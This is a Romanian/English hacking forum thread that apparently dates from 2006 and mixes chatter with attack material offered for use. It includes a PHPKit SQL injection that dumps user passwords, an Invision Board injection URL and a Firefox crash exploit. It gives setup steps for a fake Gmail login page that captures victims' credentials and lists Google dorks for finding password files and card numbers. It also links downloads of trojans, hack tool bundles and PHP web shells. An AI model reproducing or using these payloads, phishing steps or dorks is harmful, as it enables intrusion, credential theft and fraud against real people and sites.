RedJoker

Cei 2 nooby sau gasit sa comenteze ca a gresit Razvan cu VIDEO ......ei nu gresesc pentru ca nu incearca sa se implice .......eu as zice ca mai bine comenta unul mai mare decat razvan nu unul chiar incepator pe care noi il numim noob ...So Shut Up !! :@

pune pls un link bun !!! asta nu mai merge .............

GATA AM PUS UN LINK BUN !!!!

pai ca este detectabil ....antivirusl il ia ca pe un virus ...

<!-- Do 2 Nov 16:35:53 CET 2006 Vulnerable: Firefox 1.5.0.7 and probably versions below Impact: DoS (perhaps Code Execution) As Firefox 2.0 was released a few days ago... A "new" Exploit for the old version! The great Firefox! ;D On Kubuntu Linux the exploits does not just kill firefox but freezes the whole system! Probably it will also freeze other distros! If the URL is bigger than 4092 bytes, Firefox crashes! The URL in the following code is 4093 bytes! Greets: Oli Always looking for a nice talk: http://d-e-k-a-d-e-n-t.de/blog --> <html><body>DoS</body></html>

+-------------------------------------------------------------------- + + PHPKit 1.6.1 RC2 + + Original advisory: + [url]http://www.bb-pcsecurity.de/[/url] + +-------------------------------------------------------------------- + + Affected Software .: PHPKit 1.6.1 RC2 + Venedor ...........: [url]http://www.phpkit.de/[/url] + Class .............: Remote SQL Injection + Risk ..............: high + Found by ..........: Philipp Niedziela + Contact ...........: webmaster[at]bb-pcsecurity[.]de + +-------------------------------------------------------------------- + + SQL-INJECTION IN SEVERAL FILES: + guestbook/print.php + faq/faq.php + more (but untested!) + + +-------------------------------------------------------------------- + + POC: + +-------------------------------------------------------------------- + + /include.php?path=faq/faq.php&catid=-1'%20UNION%20SELECT%20 + 1,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20 + FROM%20phpkit_user%20where%20%20user_id=1%20and%20'1'='1 + + + Solution: + -> Install Hack_Block (search google + -> escape the variables in your SQL-Statement + + +-------------------------------------------------------------------- + + Greets and Thanks: /str0ke + +-------------------------[ E O F ]---------------------------------- http://www.bb-pcsecurity.de/archiv/2...kit_(faq.php)/

Invision Power Services Invision Board 2.1.7 Invision Power Services Invision Board 2.1 Invision Power Services Invision Board 2.1.6 Invision Power Services Invision Board 2.1 Invision Power Services Invision Board 2.1.5 Invision Power Services Invision Board 2.1 Invision Power Services Invision Board 2.1.4 Invision Power Services Invision Board 2.1 Alpha2 Invision Power Services Invision Board 2.1 Invision Power Services Invision Board 2.1 Invision Power Services Invision Board 2.0.4 Invision Power Services Invision Board 2.0.3 Invision Power Services Invision Board 2.0.2 Invision Power Services Invision Board 2.0.1 Invision Power Services Invision Board 2.0 PF2 Invision Power Services Invision Board 2.0 PF1 Invision Power Services Invision Board 2.0 PDR3 Invision Power Services Invision Board 2.0 Alpha 3 Invision Power Services Invision Board 2.0 Invision Power Services Invision Board 1.3.1 Final Invision Power Services Invision Board 1.3 Final Invision Power Services Invision Board 1.3 Invision Power Services Invision Board 1.3 Invision Power Services Invision Board 1.2 Invision Power Services Invision Board 1.1.2 Invision Power Services Invision Board 1.1.1 Invision Power Services Invision Board 1.0.3 Invision Power Services Invision Board 1.0.1 Invision Power Services Invision Board 1.0 Invision Power Services Invision Board 2.1.7 21013.60810.s Invision Power Services Invision Board 2.1 Invision Power Services Invision Board 2.1.6 20060619 Invision PowerServices Invision Board 2.1 http://securitydot.net/vuln/exploits/vulnerabilities/articles/18817/vuln.html CODE of the exploit: http://www.example.com/index.php?act=Online&CODE=listall&sort_key=click&st=-9999{SQl]

Here is a simple regular expression for the new GoogleCode searcher. RFI: http://www.google.com/codesearch?hl=...29&btnG=Search SQLinjection: http://www.google.com/codesearch?hl=...29&btnG=Search

super programul...il incerc ...thx dude!

Upload the file called, Gmail.html and login_to_gmail.php to your webserver, create a text file called, u_and_p.txt. It will fool your victim into thinking they are logging into gmail, they enter there email and password, it writes the details to the text file and you can view them, any time any where. Just remember, set the CHMod for the text file so only you can read it << that isnt a must but its reccommended. http://tryor.com/files/4446/Gmail_Fake_Login.zip.html

Google hacking at its finest.. Using Google, and some finely crafted searches we can find a lot of interesting information. For Example we can find: Credit Card Numbers Passwords Software / MP3's ...... (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in. Try a few of these searches: intitle:"Index of" passwords modified allinurl:auth_user_file.txt "access denied for user" "using password" "A syntax error has occurred" filetype:ihtml allinurl: admin mdb "ORA-00921: unexpected end of SQL command" inurl:passlist.txt "Index of /backup" "Chatologica MetaSearch" "stack tracking:" Amex Numbers: 300000000000000..399999999999999 MC Numbers: 5178000000000000..5178999999999999 visa 4356000000000000..4356999999999999 "parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums "parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums "parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums "parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums "parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums "parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff. METHOD 2 put this string in google search: ?intitle:index.of? mp3 You only need add the name of the song/artist/singer. Example: ?intitle:index.of? mp3 jackson METHOD 3 put this string in google search: inurl:microsoft filetype:iso You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc? "# -FrontPage-" inurl:service.pwd Frontpage passwords.. very nice clean search results listing !! "AutoCreate=TRUE password=*" This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: "http://*@www"'>http://www.coara.or.jp/~passy/ "http://*@www" domainname This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net "http://*@www" bangbus or "http://*@www"bangbus Another way is by just typing "http://bob:bob@www" "sets mode: +k" This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs. allinurl: admin mdb Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are! allinurl:auth_user_file.txt DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =) intitle:"Index of" config.php This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database. eggdrop filetype:user user These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users. intitle:index.of.etc This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun! filetype:bak inurl:"htaccess|passwd|shadow|htusers" This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version). Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences. Let's pretend you need a serial number for windows xp pro. In the google search bar type in just like this - "Windows XP Professional" 94FBR the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you. or if you want to find the serial for winzip 8.1 - "Winzip 8.1" 94FBR

CrackersKit Golden eye HellLabs Proxy Checker v7.4.18 HostScan v1.6.5.531 Invisible Browsing v4.0 IPScanner v1.86 Ascii Factory 0.6 Cool Beans NFO Creator v2.0.1.3 Dizzy v1.10 Feuer's NFO File Maker v2.0 Ims NFO&DIZ Maker 1.87 Inserter v1.12 NFO Creator v3.5.2 NFO Maker 1.0 Patchs All In One SoftIce 4.05 -Win 2000-XP IP Address Scanner IP Calculator IP Converter Port Listener Port Scanner Ping NetStat Tools Cool Trace Route TCP/IP Configuration Online - Offline Checker Resolve Host & IP Time Sync Whois & MX Lookup Connect0r Connection Analysator and prtotector Net Sender E-mail seeker Cool Net Pager Active and Passive port scanner Spoofer Hack Trapper HTTP flooder (DoS) Mass Website Visiter Advanced Port Scanner Trojan Hunter Multi IP Port Connecter Tool Advanced Spoofer http://rapidshare.com/files/2454773/40_Hack_tools_may_2006.part1.rar http://rapidshare.com/files/2454774/40_Hack_tools_may_2006.part2.rar

Apache Hacking TooLz Directory: Apache Chunked Scanner Apache Hacker Tool v 2.0 Apache H4x0r Script Remote File Inclusion And Remote Command Execution Directory : IIS 5 Dav Scanner & Exploiter PHP Attacker PHP Injection Scanner & Exploiter XML-RPC Scanner & Exploiter Databases & SQL Injection & XSS TooLz Directory Casi 4.0 ForceSQL Mssql BruteForce TooL SQL Ping 2 SQL Recon SQL Vuln Scanner SQL & XSS TooL PHP Shells **** v2.0 c99shell #16 Backdoor php v0.1 r57shell ajan casus15 cmd (asp) CyberEye (asp) CyberSpy5 (asp) Indexer (asp) Ntdaddy (asp) News Remote PHP Shell Injection PHP Shell phpRemoteView nstview php shell http://rapidshare.com/files/2447667/WebHacking_TooLz.rar

ba dar nu mai am programul alla sa il pun din nou ....sorry....

http://rapidshare.de/files/4417165/TROJANS_AIO_HACKHELL_EDITION.rar.html pass:www.hackhell.com

AntiCrash can intercept and fix up to 95.8% crashes, errors, freezes and blue screens. When a crash occurs, AntiCrash fixes it automatically; you have nothing to do! AntiCrash now also includes a unique technology, AutoRepairââ€ÃƒÆ’‚¾Ã‚

Admin Blocking is a Utility for Admins to Restrict Certian Functions of the NT based MS OS's to Temp Users of the System. It can also be used to take off restrictions set on the system. Download from - http://hubsecurity.com/hs/dl.htm

foloseste-l asta ca e mai logic: http://milw0rm.com/exploits/2753

mersi cain2k! nice post

bine ai venit si asteptam mai mult posturi de calitate de la tine

destul de bun pentru un noob dar multe au fost postate inainte ......incearca data viitoare sa cauti fiecare program la motorul de cautare sus pe pagina si ai putea daca ai fii destept sa le postezi pe rand sa vezi si cate merg si sa ai si mai multe posturi ..... sa nu te superi pe mine ca iti zic asta dar sigirur cand le dezarhivezi apar si fisiere goale .... :@

ar fi o problema daca tocmai ti-ai instalat windowsul si vrei sa ii dai registry si nu ai acces la internet ce faci ?

so this program is very cool .....and is very very good

....poate fii vechi daca merge super si este folositor....nu a mai fost postat ca ma cautat ... :p

http://share.urbanfriends.us/uploads/83122ffa7c.zip Remote-Anything